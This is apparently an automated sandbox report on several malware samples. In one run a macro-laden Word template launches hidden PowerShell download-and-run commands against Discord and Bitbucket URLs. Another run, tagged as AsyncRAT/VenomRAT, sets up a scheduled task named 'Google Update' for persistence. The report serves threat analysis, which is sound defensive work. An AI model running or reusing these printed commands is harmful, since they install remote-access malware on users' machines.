US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

memory/4128-1-0x00007FF9C026D000-0x00007FF9C026E000-memory.dmp

memory/4128-2-0x00007FF980250000-0x00007FF980260000-memory.dmp

memory/4128-4-0x00007FF980250000-0x00007FF980260000-memory.dmp

memory/4128-3-0x00007FF980250000-0x00007FF980260000-memory.dmp

memory/4128-0-0x00007FF980250000-0x00007FF980260000-memory.dmp

memory/4128-5-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-6-0x00007FF980250000-0x00007FF980260000-memory.dmp

memory/4128-7-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-10-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-9-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-12-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-15-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-16-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-14-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-13-0x00007FF97DB00000-0x00007FF97DB10000-memory.dmp

memory/4128-11-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-8-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-20-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-18-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-17-0x00007FF97DB00000-0x00007FF97DB10000-memory.dmp

memory/4128-19-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-22-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-21-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-38-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-37-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-44-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

memory/4128-45-0x00007FF9C026D000-0x00007FF9C026E000-memory.dmp

memory/4128-46-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 90e491fde30f46b3b66348b549db80bf
SHA1 62e2e4a1f87ea4b61e218ecb5c21f669e933f3be
SHA256 c44019c6fcc4f6107fa82e54dc5c2ea395d0d7419668a2810711b54b5fafacd4
SHA512 c6376f45328a87b8803c63f0bc78e0468532fb2ed05ded2dd6cfb4b0f93a6b62dad737bbafedddb5590a100dffdc256615d7ac4a6f3f75e67bee3e639ee1f42e

memory/4128-52-0x00007FF9C01D0000-0x00007FF9C03C5000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win7-20240903-en

Max time kernel

121s

Max time network

135s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\example.dotm"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2068 wrote to memory of 2892 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2892 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2892 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2892 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2692 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2692 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2692 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2692 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 2836 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2068 wrote to memory of 2836 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2068 wrote to memory of 2836 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2068 wrote to memory of 2836 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\example.dotm"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://cdn.discordapp.com/attachments/1074394309446619298/1085646503940464700/putty.exe -Dest C:\Users\Public\putty.exe;C:\Users\Public\putty.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://bitbucket.org/damnman/damn/downloads/simplecryptservice.docx -Dest C:\Users\Public\simplecryptservice.docx;C:\Users\Public\simplecryptservice.docx

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

N/A

Files

memory/2068-0-0x000000002F7D1000-0x000000002F7D2000-memory.dmp

memory/2068-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2068-2-0x00000000717AD000-0x00000000717B8000-memory.dmp

memory/2068-10-0x0000000005020000-0x0000000005120000-memory.dmp

memory/2068-18-0x0000000005020000-0x0000000005120000-memory.dmp

memory/2068-17-0x0000000005020000-0x0000000005120000-memory.dmp

memory/2068-30-0x00000000717AD000-0x00000000717B8000-memory.dmp

memory/2068-31-0x0000000005020000-0x0000000005120000-memory.dmp

memory/2068-32-0x0000000005020000-0x0000000005120000-memory.dmp

memory/2068-33-0x0000000005020000-0x0000000005120000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240903-en

Max time kernel

120s

Max time network

138s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ferrr.dotm"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ferrr.dotm"

Network

N/A

Files

memory/2296-0-0x000000002F701000-0x000000002F702000-memory.dmp

memory/2296-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2296-2-0x0000000070ACD000-0x0000000070AD8000-memory.dmp

memory/2296-8-0x00000000050E0000-0x00000000051E0000-memory.dmp

memory/2296-9-0x0000000070ACD000-0x0000000070AD8000-memory.dmp

memory/2296-10-0x00000000050E0000-0x00000000051E0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

89s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect ZGRat V2

Description Indicator Process Target
N/A N/A N/A N/A

VenomRAT

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Venomrat family

venomrat

ZGRat

rat zgrat

Zgrat family

zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2788 set thread context of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Google Update.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Google Update.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2788 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe
PID 2788 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2788 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 624 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\System32\cmd.exe
PID 624 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\System32\cmd.exe
PID 624 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\system32\cmd.exe
PID 624 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\system32\cmd.exe
PID 872 wrote to memory of 2996 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 2996 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1388 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1388 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4120 wrote to memory of 2924 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 4120 wrote to memory of 2924 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 4120 wrote to memory of 2924 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 2924 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2924 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2924 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4120 wrote to memory of 2808 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 4120 wrote to memory of 2808 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 4120 wrote to memory of 2808 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 4928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2808 wrote to memory of 4928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2808 wrote to memory of 4928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1388 wrote to memory of 4524 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 1388 wrote to memory of 4524 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 1388 wrote to memory of 4524 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 2808 wrote to memory of 4428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 2808 wrote to memory of 4428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 2808 wrote to memory of 4428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe

"C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe"

C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe

"C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpECA2.tmp.bat""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"'

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"' & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"'

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF2AD.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Users\Admin\AppData\Roaming\Google Update.exe

"C:\Users\Admin\AppData\Roaming\Google Update.exe"

C:\Users\Admin\AppData\Roaming\Google Update.exe

"C:\Users\Admin\AppData\Roaming\Google Update.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

memory/2788-0-0x000000007484E000-0x000000007484F000-memory.dmp

memory/2788-1-0x00000000003F0000-0x0000000004854000-memory.dmp

memory/2788-2-0x00000000096C0000-0x0000000009C64000-memory.dmp

memory/2788-3-0x0000000009110000-0x00000000091A2000-memory.dmp

memory/2788-4-0x0000000074840000-0x0000000074FF0000-memory.dmp

memory/2788-5-0x00000000092A0000-0x00000000092AA000-memory.dmp

memory/2788-6-0x000000000A8E0000-0x000000000A9EA000-memory.dmp

memory/2788-7-0x000000000AAF0000-0x000000000AB18000-memory.dmp

memory/2788-8-0x000000000AC80000-0x000000000AD12000-memory.dmp

memory/2788-9-0x000000000AD40000-0x000000000AD62000-memory.dmp

memory/2788-10-0x000000000AD70000-0x000000000B0C4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe

MD5 1f304261de14934db9384720c638744a
SHA1 b98f60e6feea77a31363d5a686e7be40f6cfc049
SHA256 ab23ec09d1ea7a359bd834f2fef7aa5272e8f643e9c27cb2bfe8869a6e447e87
SHA512 01f29cf8553d72070c56b953c23771fef9e4aba31b733b001f7b8a1e49e2cf02d120b21baf76ccfa9040548ed603c0308c95a4fedce7b4749fc01baf3c4fc826

memory/624-23-0x00000000006E0000-0x00000000006F8000-memory.dmp

memory/624-22-0x00007FFBFC663000-0x00007FFBFC665000-memory.dmp

memory/4120-25-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2788-27-0x0000000074840000-0x0000000074FF0000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/624-29-0x00007FFBFC660000-0x00007FFBFD121000-memory.dmp

memory/4120-30-0x0000000005730000-0x0000000005740000-memory.dmp

memory/4120-31-0x000000007484E000-0x000000007484F000-memory.dmp

memory/624-36-0x00007FFBFC660000-0x00007FFBFD121000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpECA2.tmp.bat

MD5 dfca17a60eff55e49d6e7e5e37900403
SHA1 a32dfb6f885dbd428643eb37ac560b46e47bd4b8
SHA256 2d952f987504f8b6d52fdfef3d370d2fefbcb60899372091818b98b98090abdc
SHA512 d596d5ffe689a76053061b656034aa5b9e56c9194c22459ced66209952d29b52b5e5292f324536977b8e94da8c163fa25fbe9b7ad40eb71e8880536b98777d6d

C:\Users\Admin\AppData\Local\Temp\tmpF2AD.tmp.bat

MD5 0ec9451077262e70a46e00a1a5e83014
SHA1 8e0c7fb4eeadb36c102b3a16dcab4479b6b5554d
SHA256 360fa6020b4182aa58a961492beeac41d51e80158aab0b66ba2c7d9529e3065a
SHA512 c5367719240f64eaf531ed887a677ba6eccda3866c910520c2a9c93f1a12578f8ff56a38622dca1b53a515b3a1c87039db809945ce865ede9edcfb9ff27a7cb1

C:\Users\Admin\AppData\Roaming\Google Update.exe

MD5 5d4073b2eb6d217c19f2b22f21bf8d57
SHA1 f0209900fbf08d004b886a0b3ba33ea2b0bf9da8
SHA256 ac1a3f21fcc88f9cee7bf51581eafba24cc76c924f0821deb2afdf1080ddf3d3
